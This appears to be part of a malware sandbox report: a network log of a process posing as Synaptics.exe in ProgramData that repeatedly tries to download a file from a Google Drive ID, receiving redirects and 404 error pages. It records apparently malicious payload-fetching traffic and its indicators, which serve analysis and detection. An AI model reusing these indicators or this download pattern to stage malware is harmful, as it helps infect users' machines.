                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-FvRaES_PEqnjW17cbjPPkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      22192.168.2.649832142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:44 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:44 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-qNMhi5mwmEKzt7Duws7jZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      23192.168.2.649833142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:44 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:44 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-oA1qnrZ9dVBpoPk8__zSTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      24192.168.2.649836142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:44 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:45 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5lDUluWjpr3icEoJTIspjwaL921ropBmxiIdkDPQyJQZ9eVefFMw8gZJWCnaZA4loNWgmrtLU
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:45 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zH9V_vV7xkUPDx2Cv6nqrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:45 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:45 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 66 50 76 47 53 39 5f 6e 78 64 6d 41 69 38 4e 78 6b 79 36 6c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="OfPvGS9_nxdmAi8Nxky6lw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:45 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      25192.168.2.649835142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:44 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:45 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5va-gYexViE6-FtIzOZPQ2BNpD1s3RTWRfark6q3muu_XGaDNDpoLmoAn5x3HlxHIQISUXRiw
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:45 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Pm3g7F377XXyk0ZJsPa0Iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:45 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:45 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 49 53 54 45 36 78 64 52 47 5a 64 70 68 56 50 51 49 46 36 67 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="DISTE6xdRGZdphVPQIF6gg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:45 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      26192.168.2.649845142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:45 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      27192.168.2.649846142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:45 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      28192.168.2.649854142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:46 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:46 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-f4CRNDc4sK_UP4XX4Ujonw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      29192.168.2.649855142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:46 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:46 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-sC7rTsbcSCOj5n8SsHwKHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      30192.168.2.649862142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:47 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:47 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-GYFitZDoMpFODr619R-FiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      31192.168.2.649864142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:47 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:47 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-gCnMaZr4awSEM9PTFmYAqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      32192.168.2.649861142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:47 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:47 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4ZJCzwavFvV_jXkamolU4IcoO7y94mslB5IkprvD56BsXczWtSZpis6lfxTOSooCBSP3DrYIU
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:47 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
